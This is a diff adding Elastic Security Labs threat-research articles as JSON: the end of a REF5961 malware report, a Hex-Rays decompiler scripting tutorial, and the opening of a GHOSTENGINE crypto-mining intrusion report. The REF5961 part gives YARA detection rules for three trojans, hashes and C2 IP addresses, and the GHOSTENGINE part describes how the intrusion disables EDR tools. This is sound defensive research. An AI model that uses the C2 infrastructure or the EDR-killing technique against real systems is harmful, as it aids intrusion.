[Collection](https://attack.mitre.org/tactics/TA0009/)\n\n### Techniques\n\nTechniques represent how an adversary achieves a tactical goal by performing an action.\n* EAGERBEE\n * [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)\n * [System Information Discovery](https://attack.mitre.org/techniques/T1082/)\n * [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)\n * [Proxy](https://attack.mitre.org/techniques/T1090/)\n * [Process Injection](https://attack.mitre.org/techniques/T1055/)\n* RUDEBIRD\n * [File and Directory Discovery](https://attack.mitre.org/tactics/TA0007/#:~:text=T1083-,File%20and%20Directory%20Discovery,-Adversaries%20may%20enumerate)\n * [System Information Discovery](https://attack.mitre.org/techniques/T1082)\n * [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)\n * [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570/)\n * [Data from Local System](https://attack.mitre.org/techniques/T1005)\n* DOWNTOWN\n * [File and Directory Discovery](https://attack.mitre.org/tactics/TA0007/#:~:text=T1083-,File%20and%20Directory%20Discovery,-Adversaries%20may%20enumerate)\n * [System Information Discovery](https://attack.mitre.org/techniques/T1082)\n\n## Malware prevention capabilities\n* [EAGERBEE](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_EagerBee.yar)\n* [RUDEBIRD](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_RudeBird.yar)\n* [DOWNTOWN](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_DownTown.yar)\n\n## YARA\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the EAGERBEE, RUDEBIRD, and DOWNTOWN malware:\n\n### EAGERBEE\n```\nrule Windows_Trojan_EagerBee_1 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-05-09\"\n last_modified = \"2023-06-13\"\n threat_name = \"Windows.Trojan.EagerBee\"\n reference_sample = \"09005775fc587ac7bf150c05352e59dc01008b7bf8c1d870d1cea87561aa0b06\"\n license = \"Elastic License v2\"\n os = \"windows\"\n\n strings:\n $a1 = { C2 EB D6 0F B7 C2 48 8D 0C 80 41 8B 44 CB 14 41 2B 44 CB 0C 41 }\n $a2 = { C8 75 04 33 C0 EB 7C 48 63 41 3C 8B 94 08 88 00 00 00 48 03 D1 8B }\n\n condition:\n all of them\n}\n\nrule Windows_Trojan_EagerBee_2 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-09-04\"\n last_modified = \"2023-09-20\"\n threat_name = \"Windows.Trojan.EagerBee\"\n reference_sample = \"339e4fdbccb65b0b06a1421c719300a8da844789a2016d58e8ce4227cb5dc91b\"\n license = \"Elastic License v2\"\n os = \"windows\"\n\n strings:\n $dexor_config_file = { 48 FF C0 8D 51 FF 44 30 00 49 03 C4 49 2B D4 ?? ?? 48 8D 4F 01 48 }\n $parse_config = { 80 7C 14 20 3A ?? ?? ?? ?? ?? ?? 45 03 C4 49 03 D4 49 63 C0 48 3B C1 }\n $parse_proxy1 = { 44 88 7C 24 31 44 88 7C 24 32 48 F7 D1 C6 44 24 33 70 C6 44 24 34 3D 88 5C 24 35 48 83 F9 01 }\n $parse_proxy2 = { 33 C0 48 8D BC 24 F0 00 00 00 49 8B CE F2 AE 8B D3 48 F7 D1 48 83 E9 01 48 8B F9 }\n\n condition:\n 2 of them\n}\n```\n\n### RUDEBIRD\n```\nrule Windows_Trojan_RudeBird {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-05-09\"\n last_modified = \"2023-06-13\"\n threat_name = \"Windows.Trojan.RudeBird\"\n license = \"Elastic License v2\"\n os = \"windows\"\n\n strings:\n $a1 = { 40 53 48 83 EC 20 48 8B D9 B9 D8 00 00 00 E8 FD C1 FF FF 48 8B C8 33 C0 48 85 C9 74 05 E8 3A F2 }\n\n condition:\n all of them\n}\n```\n\n### DOWNTOWN\n```\nrule Windows_Trojan_DownTown_1 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-05-10\"\n last_modified = \"2023-06-13\"\n threat_name = \"Windows.Trojan.DownTown\"\n license = \"Elastic License v2\"\n os = \"windows\"\n\n strings:\n $a1 = \"SendFileBuffer error -1 !!!\" fullword\n $a2 = \"ScheduledDownloadTasks CODE_FILE_VIEW \" fullword\n $a3 = \"ExplorerManagerC.dll\" fullword\n\n condition:\n 3 of them\n}\n\nrule Windows_Trojan_DownTown_2 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-08-23\"\n last_modified = \"2023-09-20\"\n threat_name = \"Windows.Trojan.DownTown\"\n license = \"Elastic License v2\"\n os = \"windows\"\n\n strings:\n $a1 = \"DeletePluginObject\"\n $a2 = \"GetPluginInfomation\"\n $a3 = \"GetPluginObject\"\n $a4 = \"GetRegisterCode\"\n\n condition:\n all of them\n}\n```\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ref5961) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|---------|--------------------|----------------|\n| `ce4dfda471f2d3fa4e000f9e3839c3d9fbf2d93ea7f89101161ce97faceadf9a` | SHA-256 | EAGERBEE shellcode | iconcaches.mui |\n| `29c90ac124b898b2ff2a4897921d5f5cc251396e8176fc8d6fa475df89d9274d` | SHA-256 | DOWNTOWN | In-memory DLL |\n| `185.82.217[.]164` | ipv4 | EAGERBEE C2 | |\n| `195.123.245[.]79` | ipv4 | EAGERBEE C2 | |\n| `45.90.58[.]103` | ipv4 | RUDEBIRD C2 | |\n| `185.195.237[.]123` | ipv4 | RUDEBIRD C2 | |\n\n## References\n\nThe following were referenced throughout the above research:\n* [https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) \n* [https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns) \n* [https://thediplomat.com/2022/06/mongolias-1-billion-tree-movement/](https://thediplomat.com/2022/06/mongolias-1-billion-tree-movement/) \n* [https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/](https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/) \n* [https://github.com/OALabs/hashdb/blob/main/algorithms/mult21_add.py](https://github.com/OALabs/hashdb/blob/main/algorithms/mult21_add.py) \n* [https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager](https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager)\n* [https://malpedia.caad.fkie.fraunhofer.de/actor/ta428](https://malpedia.caad.fkie.fraunhofer.de/actor/ta428) \n* [https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/](https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/) \n"
+ },
+ "title": "Introducing the REF5961 intrusion set",
+ "slug": "introducing-the-ref5961-intrusion-set",
+ "date": "2023-10-04",
+ "description": "The REF5961 intrusion set discloses three new malware families targeting ASEAN members. The threat actor leveraging this intrusion set continues to develop and mature their capabilities.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "cyril-francois"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "photo-edited-08@2x.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "security-research",
+ "malware-analysis",
+ "ref5961",
+ "ref2924",
+ "eagerbee",
+ "downtown",
+ "rudebird"
+ ]
+ },
+ "id": "security_labs_content-introducing_the_ref5961_intrusion_set-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introduction_to_hexrays_decompilation_internals-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introduction_to_hexrays_decompilation_internals-md.json
new file mode 100644
index 00000000000..046c97a5548
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introduction_to_hexrays_decompilation_internals-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Introduction to Hex-Rays decompilation internals\"\nslug: \"introduction-to-hexrays-decompilation-internals\"\ndate: \"2024-02-14\"\ndescription: \"In this publication, we delve into Hex-Rays microcode and explore techniques for manipulating the generated CTree to deobfuscate and annotate decompiled code.\"\nauthor:\n - slug: salim-bitam\nimage: \"photo-edited-05.png\"\ncategory:\n - slug: malware-analysis\ntags:\n - malware-analysis\n---\n\n## Introduction\n\nIn this publication, we delve into Hex-Rays microcode and explore techniques for manipulating the generated CTree to deobfuscate and annotate decompiled code. The final section includes a practical example demonstrating how to annotate a custom import table for malware analysis.\n\nThis guide is meant to help reverse engineers and malware analysts better understand the internal structures used during IDA's function decompilation. We advise keeping an eye on the [Hex-Rays SDK](https://hex-rays.com/products/decompiler/manual/sdk/index.shtml) that can be found under IDA PRO’s plugins directory, all the structures discussed below are sourced from it.\n\n## Architecture\n\nHex-Rays decompiles a function through a multistage process starting with the disassembled code of a function:\n 1. Assembly code to microcode: \n It does a conversion of the assembly instructions that are stored in an [`insn_t`](https://hex-rays.com/products/ida/support/sdkdoc/classinsn__t.html) structure to microcode instructions represented by a [`minsn_t`](https://hex-rays.com/products/decompiler/manual/sdk/classminsn__t.shtml) structure\n\n 2. CTree generation: \n From the optimized microcode, Hex-Rays generates the Abstract Syntax Tree(AST), its nodes are either statements ([`cinsn_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcinsn__t.shtml)) or expressions ([`cexpr_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcexpr__t.shtml)); note that both `cinsn_t` and `cexpr_t` inherit from the [`citem_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcitem__t.shtml) structure\n\n## Microcode\n\nMicrocode is an intermediate language (IL) used by Hex-Rays, generated by lifting the assembly code of a binary. This has multiple advantages, one of which is that it is processor-independent.\n\nThe following screenshot displays the assembly and decompiled code, alongside its microcode extracted using [Lucid](https://github.com/gaasedelen/lucid), a tool that facilitates microcode visualization.\n\n\n\nWe can access the MBA (microcode block array) through the `cfunc_t` structure of a decompiled function with the MBA field.\n\n_Tip:_ we get the `cfunc_t` of a decompiled function with the `ida_hexrays.decompile`.\n\n[`mba_t`](https://hex-rays.com/products/decompiler/manual/sdk/classmba__t.shtml) is an array of micro blocks [`mblock_t`](https://hex-rays.com/products/decompiler/manual/sdk/classmblock__t.shtml), the first block represents the entry point of the function and the last one represents the end. Micro blocks (`mblock_t`) are structured in a double linked list, we can access the next / previous block with `nextb`/`prevb` fields respectively. Each `mblock_t` includes a double linked list of microcode instructions `minsn_t`, accessed by the field `head` for the first instruction of the block and `tail` for the last instruction of the block. The `mblock_t` structure is depicted in the following code snippet.\n\n```C\nclass mblock_t\n{\n//...\npublic:\n mblock_t *nextb; ///< next block in the doubly linked list\n mblock_t *prevb; ///< previous block in the doubly linked list\n uint32 flags; ///< combination of \\ref MBL_ bits\n ea_t start; ///< start address\n ea_t end; ///< end address\n minsn_t *head; ///< pointer to the first instruction of the block\n minsn_t *tail; ///< pointer to the last instruction of the block\n mba_t *mba; \n```\n \nA microcode instruction `minsn_t` is a double linked list, each microcode instruction contains 3 operands: left, right, and destination. We can access the next/previous microcode instruction of the same block with `next`/`prev` fields; the opcode field is an enumeration ([`mcode_t`](https://hex-rays.com/products/decompiler/manual/sdk/hexrays_8hpp.shtml#:~:text=enum-,mcode_t,-%7B%0A%C2%A0%C2%A0m_nop)) of all the microinstruction opcodes, for example, the `m_mov` enum represents the `mov` opcode.\n\n```C\nclass minsn_t\n{\n//...\npublic:\n mcode_t opcode; ///< instruction opcode enumeration\n int iprops; ///< combination of \\ref IPROP_ bits\n minsn_t *next; ///< next insn in doubly linked list. check also nexti()\n minsn_t *prev; ///< prev insn in doubly linked list. check also previ()\n ea_t ea; ///< instruction address\n mop_t l; ///< left operand\n mop_t r; ///< right operand\n mop_t d; ///< destination operand\n //...\n\nenum mcode_t\n{\n m_nop = 0x00, // nop // no operation\n m_stx = 0x01, // stx l, {r=sel, d=off} // store register to memory \n m_ldx = 0x02, // ldx {l=sel,r=off}, d // load register from memory \n m_ldc = 0x03, // ldc l=const, d // load constant\n m_mov = 0x04, // mov l, d // move \n m_neg = 0x05, // neg l, d // negate\n m_lnot = 0x06, // lnot l, d // logical not\n//...\n};\n```\n\nEach operand is of type [`mop_t`](https://hex-rays.com/products/decompiler/manual/sdk/classmop__t.shtml), depending on the type (accessed with the `t` field) it can hold registers, immediate values, and even nested microcode instructions. As an example, the following is the microcode of a function with multiple nested instructions:\n\n\n\n```C\nclass mop_t\n{\n\tpublic:\n\t /// Operand type.\n\t mopt_t t;\n\tunion\n\t {\n\t mreg_t r; // mop_r register number\n\t mnumber_t *nnn; // mop_n immediate value\n\t minsn_t *d; // mop_d result (destination) of another instruction\n\t stkvar_ref_t *s; // mop_S stack variable\n\t ea_t g; // mop_v global variable (its linear address)\n\t int b; // mop_b block number (used in jmp,call instructions)\n\t mcallinfo_t *f; // mop_f function call information\n\t lvar_ref_t *l; // mop_l local variable\n\t mop_addr_t *a; // mop_a variable whose address is taken\n\t char *helper; // mop_h helper function name\n\t char *cstr; // mop_str utf8 string constant, user representation\n\t mcases_t *c; // mop_c cases\n\t fnumber_t *fpc; // mop_fn floating point constant\n\t mop_pair_t *pair; // mop_p operand pair\n\t scif_t *scif; // mop_sc scattered operand info\n\t };\n\t#...\n}\n\n/// Instruction operand types\ntypedef uint8 mopt_t;\nconst mopt_t\n mop_z = 0, ///< none\n mop_r = 1, ///< register (they exist until MMAT_LVARS)\n mop_n = 2, ///< immediate number constant\n mop_str = 3, ///< immediate string constant (user representation)\n #...\n```\n\nThe microcode generation progresses through various maturity levels, also referred to as optimization levels. The initial level, `MMAT_GENERATED`, involves the direct translation of assembly code into microcode. The final optimization level before generating the CTree is `MMAT_LVARS`.\n\n```C\nenum mba_maturity_t\n{\n MMAT_ZERO, ///< microcode does not exist\n MMAT_GENERATED, ///< generated microcode\n MMAT_PREOPTIMIZED, ///< preoptimized pass is complete\n MMAT_LOCOPT, ///< local optimization of each basic block is complete.\n ///< control flow graph is ready too.\n MMAT_CALLS, ///< detected call arguments\n MMAT_GLBOPT1, ///< performed the first pass of global optimization\n MMAT_GLBOPT2, ///< most global optimization passes are done\n MMAT_GLBOPT3, ///< completed all global optimization. microcode is fixed now.\n MMAT_LVARS, ///< allocated local variables\n};\n```\n\n### Microcode traversal example\n\nThe following Python code is used as an example of how to traverse and print the microcode instructions of a function, it traverses the microcode generated at the first maturity level (`MMAT_GENERATED`).\n\n```Python\nimport idaapi\nimport ida_hexrays\nimport ida_lines\n\n\nMCODE = sorted([(getattr(ida_hexrays, x), x) for x in filter(lambda y: y.startswith('m_'), dir(ida_hexrays))])\n\ndef get_mcode_name(mcode):\n \"\"\"\n Return the name of the given mcode_t.\n \"\"\"\n for value, name in MCODE:\n if mcode == value:\n return name\n return None\n\n\ndef parse_mop_t(mop):\n if mop.t != ida_hexrays.mop_z:\n return ida_lines.tag_remove(mop._print())\n return ''\n\n\ndef parse_minsn_t(minsn):\n opcode = get_mcode_name(minsn.opcode)\n ea = minsn.ea\n \n text = hex(ea) + \" \" + opcode\n for mop in [minsn.l, minsn.r, minsn.d]:\n text += ' ' + parse_mop_t(mop)\n print(text)\n \n \ndef parse_mblock_t(mblock):\n minsn = mblock.head\n while minsn and minsn != mblock.tail:\n parse_minsn_t(minsn)\n minsn = minsn.next\n \n\ndef parse_mba_t(mba):\n for i in range(0, mba.qty):\n mblock_n = mba.get_mblock(i)\n parse_mblock_t(mblock_n)\n\n\ndef main():\n func = idaapi.get_func(here()) # Gets the function at the current cursor\n maturity = ida_hexrays.MMAT_GENERATED\n mbr = ida_hexrays.mba_ranges_t(func)\n hf = ida_hexrays.hexrays_failure_t()\n ida_hexrays.mark_cfunc_dirty(func.start_ea)\n mba = ida_hexrays.gen_microcode(mbr, hf, None, ida_hexrays.DECOMP_NO_WAIT, maturity)\n parse_mba_t(mba)\n\n\nif __name__ == '__main__':\n main()\n```\n\nThe script's output is presented below: on the left, the printed microcode in the console, and on the right, the assembly code by IDA:\n\n\n\n### CTree\n\nIn this section, we'll dive into the core elements of Hex-Rays CTree structure, then proceed to a practical example demonstrating how to annotate a custom import table of malware that loads APIs dynamically.\n\nFor a better understanding, we will be leveraging the following plugin ([hrdevhelper](https://github.com/patois/HRDevHelper)) that allows us to view the CTree nodes in IDA as a graph.\n\n\n\n[`citem_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcitem__t.shtml) is an abstract class that is the base for both [`cinsn_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcinsn__t.shtml) and [`cexpr_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcexpr__t.shtml), it holds common info like the address, item type and label while also featuring constants like `is_expr`, `contains_expr` that can be used to know the type of the object:\n\n```C\nstruct citem_t\n{\n ea_t ea = BADADDR; ///< address that corresponds to the item. may be BADADDR\n ctype_t op = cot_empty; ///< item type\n int label_num = -1; ///< label number. -1 means no label. items of the expression\n ///< types (cot_...) should not have labels at the final maturity\n ///< level, but at the intermediate levels any ctree item\n ///< may have a label. Labels must be unique. Usually\n ///< they correspond to the basic block numbers.\n mutable int index = -1; ///< an index in cfunc_t::treeitems.\n ///< meaningful only after print_func()\n//...\n```\n\nThe item type accessed with the `op` field indicates the type of the node, expression nodes are prefixed with `cot_` and the statements nodes are prefixed with `cit_`, example `cot_asg` indicates that the node is an assignment expression while `cit_if` indicates that the node is a condition (if) statement.\n\nDepending on the type of the statement node, a `cinsn_t` can have a different attribute for example if the item type is `cit_if` we can access the detail of the condition node through the `cif` field, as seen in the below snippet, `cinsn_t` is implemented using a union. Note that a [`cblock_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcblock__t.shtml) is a block statement which is a list of `cinsn_t` statements, we can find this type for example at the beginning of a function or after a conditional statement.\n\n```C\nstruct cinsn_t : public citem_t\n{\n union\n {\n cblock_t *cblock; ///< details of block-statement\n cexpr_t *cexpr; ///< details of expression-statement\n cif_t *cif; ///< details of if-statement\n cfor_t *cfor; ///< details of for-statement\n cwhile_t *cwhile; ///< details of while-statement\n cdo_t *cdo; ///< details of do-statement\n cswitch_t *cswitch; ///< details of switch-statement\n creturn_t *creturn; ///< details of return-statement\n cgoto_t *cgoto; ///< details of goto-statement\n casm_t *casm; ///< details of asm-statement\n };\n//...\n```\n\nIn the example below, the condition node of type `cit_if` has two child nodes: the left one is of type `cit_block` which represents the \"True\" branch and the right is the condition to evaluate, which is a call to a function, a third child is missing as the condition does not have a \"False\" branch.\n\nThe following is a graph showcasing the statement node cit_if\n\n\n\nFind the associated decompilation for the above CTree:\n\n\n\nThe same logic applies to expressions nodes `cexpr_t`, depending on the node type, different attributes are available, as an example, a node of type `cot_asg` has children nodes accessible with the fields `x` and `y`.\n\n\n\n```C\nstruct cexpr_t : public citem_t\n{\n union\n {\n cnumber_t *n; ///< used for \\ref cot_num\n fnumber_t *fpc; ///< used for \\ref cot_fnum\n struct\n {\n union\n {\n var_ref_t v; ///< used for \\ref cot_var\n ea_t obj_ea; ///< used for \\ref cot_obj\n };\n int refwidth; ///< how many bytes are accessed? (-1: none)\n };\n struct\n {\n cexpr_t *x; ///< the first operand of the expression\n union\n {\n cexpr_t *y; ///< the second operand of the expression\n carglist_t *a;///< argument list (used for \\ref cot_call)\n uint32 m; ///< member offset (used for \\ref cot_memptr, \\ref cot_memref)\n ///< for unions, the member number\n };\n union\n {\n cexpr_t *z; ///< the third operand of the expression\n int ptrsize; ///< memory access size (used for \\ref cot_ptr, \\ref cot_memptr)\n };\n };\n//...\n```\n\nFinally the [`cfunc_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcfunc__t.shtml) structure holds information related to the decompiled function, the function address, the microcode block array, and the CTree accessed with the `entry_ea`, `mba` and `body` fields respectively.\n\n```C\nstruct cfunc_t\n{\n ea_t entry_ea; ///< function entry address\n mba_t *mba; ///< underlying microcode\n cinsn_t body; ///< function body, must be a block\n//...\n```\n\n### CTree traversal example\n\nThe provided Python code serves as a mini recursive visitor of a CTree, note that it does not handle all node types, the last section will describe how to use the Hex-Rays built-in visitor class [`ctree_visitor_t`](https://hex-rays.com/products/decompiler/manual/sdk/structctree__visitor__t.shtml). To begin, we obtain the `cfunc` of the function using `ida_hexrays.decompile` and access its CTree via the `body` field.\n\nNext, we check if the node(item) is an expression or a statement. Finally, we can parse the type through the `op` field and explore its child nodes.\n\n```Python\nimport idaapi\nimport ida_hexrays\n\nOP_TYPE = sorted([(getattr(ida_hexrays, x), x) for x in filter(lambda y: y.startswith('cit_') or y.startswith('cot_'), dir(ida_hexrays))])\n\n\ndef get_op_name(op):\n \"\"\"\n Return the name of the given mcode_t.\n \"\"\"\n for value, name in OP_TYPE:\n if op == value:\n return name\n return None\n\n\ndef explore_ctree(item):\n print(f\"item address: {hex(item.ea)}, item opname: {item.opname}, item op: {get_op_name(item.op)}\")\n if item.is_expr():\n if item.op == ida_hexrays.cot_asg:\n explore_ctree(item.x) # left side\n explore_ctree(item.y) # right side\n\n elif item.op == ida_hexrays.cot_call:\n explore_ctree(item.x)\n for a_item in item.a: # call parameters\n explore_ctree(a_item)\n\n elif item.op == ida_hexrays.cot_memptr:\n explore_ctree(item.x)\n else:\n if item.op == ida_hexrays.cit_block:\n for i_item in item.cblock: # list of statement nodes\n explore_ctree(i_item)\n\n elif item.op == ida_hexrays.cit_expr:\n explore_ctree(item.cexpr)\n \n elif item.op == ida_hexrays.cit_return:\n explore_ctree(item.creturn.expr)\n \n\ndef main():\n cfunc = ida_hexrays.decompile(here())\n ctree = cfunc.body\n explore_ctree(ctree)\n\n\nif __name__ == '__main__':\n main()\n```\n\nDisplayed below is the output of the traversal script executed on the `start` function of a [BLISTER](https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader) [sample](https://www.virustotal.com/gui/file/c98137e064bc0cd32ed0415e19daf16ed451fe1289bc41e7251dd79326206d53):\n\n\n\n### Practical example: annotating the custom import table of a malware sample\n\nNow that we've gained insights into the architecture and structures of the generated CTree, let's delve into a practical application and explore how to automate the annotation of a custom import table of malware.\n\n\n\nHex-Rays provides a utility class [`ctree_visitor_t`](https://hex-rays.com/products/decompiler/manual/sdk/structctree__visitor__t.shtml) that can be used to traverse and modify the CTree, two important virtual methods to know are:\n - `visit_insn`: to visit a statement\n - `visit_expr`: to visit an expression\n\nFor this example, the same BLISTER sample is used; after locating the function that gets Windows APIs addresses by hash at address 0x7FF8CC3B0926(in the .rsrc section), adding the enumeration to the IDB and applying the enum type to its parameter, we create a class that inherits from `ctree_visitor_t`, as we are interested in expressions, we will be overriding `visit_expr` only.\n\n\n\nThe idea is to locate a `cot_call` node(1) of the function that resolves APIs by passing the `obj_ea` address of node’s first child to the function `idc.get_name` which will return the function name.\n\n```Python\n if expr.op == idaapi.cot_call:\n if idc.get_name(expr.x.obj_ea) == self.func_name:\n\t\t#...\n```\n\nNext retrieve the enum of the hash by accessing the right parameter of the call node(2), in our case parameter 3.\n\n```Python\n carg_1 = expr.a[HASH_ENUM_INDEX]\n api_name = ida_lines.tag_remove(carg_1.cexpr.print1(None)) # Get API name\n```\n\nThe next step is to locate the variable that has been assigned the address value of the WinAPI function. To do that we first need to locate the `cot_asg` node(3), parent of the call node by using the `find_parent_of` method under `cfunc.body` of the decompiled function.\n\n```Python\n asg_expr = self.cfunc.body.find_parent_of(expr) # Get node parent\n```\n\nFinally, we can access the first child node(4) under the `cot_asg` node, which is of type `cot_var` and get the current variable name, the Hex-Rays API [`ida_hexrays.rename_lvar`](https://hex-rays.com/products/decompiler/manual/sdk/hexrays_8hpp.shtml#ab719cfcfa884c57284cd946ac90b3c17) is used to rename the new variable with the Windows API name taken from the enum parameter.\n\nThis process can ultimately save a significant amount of time for an analyst. Instead of spending time on relabeling variables, they can direct their attention to the core functionality. An understanding of how CTrees work can contribute to the development of more effective plugins, enabling the handling of more complex obfuscations.\n\nFor a complete understanding and context of the example, please find the entire code below:\n\n```Python\nimport idaapi\nimport ida_hexrays\nimport idc\nimport ida_lines\nimport random\nimport string\n\nHASH_ENUM_INDEX = 2\n\n\ndef generate_random_string(length):\n letters = string.ascii_letters\n return \"\".join(random.choice(letters) for _ in range(length))\n\n\nclass ctree_visitor(ida_hexrays.ctree_visitor_t):\n def __init__(self, cfunc):\n ida_hexrays.ctree_visitor_t.__init__(self, ida_hexrays.CV_FAST)\n self.cfunc = cfunc\n self.func_name = \"sub_7FF8CC3B0926\"# API resolution function name\n\n def visit_expr(self, expr):\n if expr.op == idaapi.cot_call:\n if idc.get_name(expr.x.obj_ea) == self.func_name:\n carg_1 = expr.a[HASH_ENUM_INDEX]\n api_name = ida_lines.tag_remove(\n carg_1.cexpr.print1(None)\n ) # Get API name\n expr_parent = self.cfunc.body.find_parent_of(expr) # Get node parent\n\n # find asg node\n while expr_parent.op != idaapi.cot_asg:\n expr_parent = self.cfunc.body.find_parent_of(expr_parent)\n\n if expr_parent.cexpr.x.op == idaapi.cot_var:\n lvariable_old_name = (\n expr_parent.cexpr.x.v.getv().name\n ) # get name of variable\n ida_hexrays.rename_lvar(\n self.cfunc.entry_ea, lvariable_old_name, api_name\n ) # rename variable\n return 0\n\n\ndef main():\n cfunc = idaapi.decompile(idc.here())\n v = ctree_visitor(cfunc)\n v.apply_to(cfunc.body, None)\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n## Conclusion\n\nConcluding our exploration into Hex-Rays microcode and CTree generation, we've gained practical techniques for navigating the complexities of malware obfuscation. The ability to modify Hex-Rays pseudo code allows us to cut through obfuscation like Control Flow Obfuscation, remove dead code, and many more. The Hex-Rays C++ SDK emerges as a valuable resource, offering well-documented guidance for future reference. \n\nWe hope that this guide will be helpful to fellow researchers and any avid learner, please find all the scripts in our [research repository](https://github.com/elastic/labs-releases/tree/main/tools/ida_scripts).\n\n## Resources\n\n - [Ilfak Guilfanov's Decompiler Internals: Microcode presentation](https://i.blackhat.com/us-18/Thu-August-9/us-18-Guilfanov-Decompiler-Internals-Microcode-wp.pdf)\n - [Hex-Rays decompiler primer](https://hex-rays.com/blog/hex-rays-decompiler-primer)\n - [HRDevHelper](https://github.com/patois/HRDevHelper/)\n - [lucid utility](https://github.com/gaasedelen/lucid)\n - [Hex-Rays SDK](https://hex-rays.com/products/decompiler/manual/sdk/)\n - [Elastic Security Labs enablement tools](https://github.com/elastic/labs-releases)\n"
+ },
+ "title": "Introduction to Hex-Rays decompilation internals",
+ "slug": "introduction-to-hexrays-decompilation-internals",
+ "date": "2024-02-14",
+ "description": "In this publication, we delve into Hex-Rays microcode and explore techniques for manipulating the generated CTree to deobfuscate and annotate decompiled code.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "photo-edited-05.png",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "malware-analysis"
+ ]
+ },
+ "id": "security_labs_content-introduction_to_hexrays_decompilation_internals-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-invisible_miners_unveiling_ghostengine-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-invisible_miners_unveiling_ghostengine-md.json
new file mode 100644
index 00000000000..4c7730da1e3
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-invisible_miners_unveiling_ghostengine-md.json
@@ -0,0 +1,40 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Invisible miners: unveiling GHOSTENGINE’s crypto mining operations\"\nslug: \"invisible-miners-unveiling-ghostengine\"\ndate: \"2024-05-22\"\ndescription: \"Elastic Security Labs has identified REF4578, an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining.\"\nauthor:\n - slug: salim-bitam\n - slug: samir-bousseaden\n - slug: terrance-dejesus\n - slug: andrew-pease\nimage: \"ghostengine.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - ref4578\n - ghostengine\n - xmrig\n - crypto\n - hiddenshovel\n---\n\n## Preamble\n\nElastic Security Labs has identified an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining. Additionally, the team discovered capabilities to establish persistence, install a previously undocumented backdoor, and execute a crypto-miner. We refer to this intrusion set as REF4578 and the primary payload as GHOSTENGINE (tangental research by the team at Antiy has named parts of this intrusion set [HIDDENSHOVEL](https://www.antiy.com/response/HideShoveling.html)).\n\n## Key takeaways\n\n* Malware authors incorporated many contingency and duplication mechanisms\n* GHOSTENGINE leverages vulnerable drivers to terminate and delete known EDR agents that would likely interfere with the deployed and well-known coin miner\n* This campaign involved an uncommon amount of complexity to ensure both the installation and persistence of the XMRIG miner\n\n## Code analysis \n\n\n\nOn May 6, 2024, at 14:08:33 UTC, the execution of a PE file named `Tiworker.exe` (masquerading as the legitimate Windows `TiWorker.exe` file) signified the beginning of the REF4578 intrusion. The following alerts were captured in telemetry, indicating a known vulnerable driver was deployed.\n\n\n\nUpon execution, this file downloads and executes a PowerShell script that orchestrates the entire execution flow of the intrusion. Analysis revealed that this binary executes a hardcoded PowerShell command line to retrieve an obfuscated script, `get.png,` which is used to download further tools, modules, and configurations from the attacker C2– as depicted in the screenshot below.\n\n\n\n### GHOSTENGINE\n\nGHOSTENGINE is responsible for retrieving and executing modules on the machine. It primarily uses HTTP to download files from a configured domain, with a 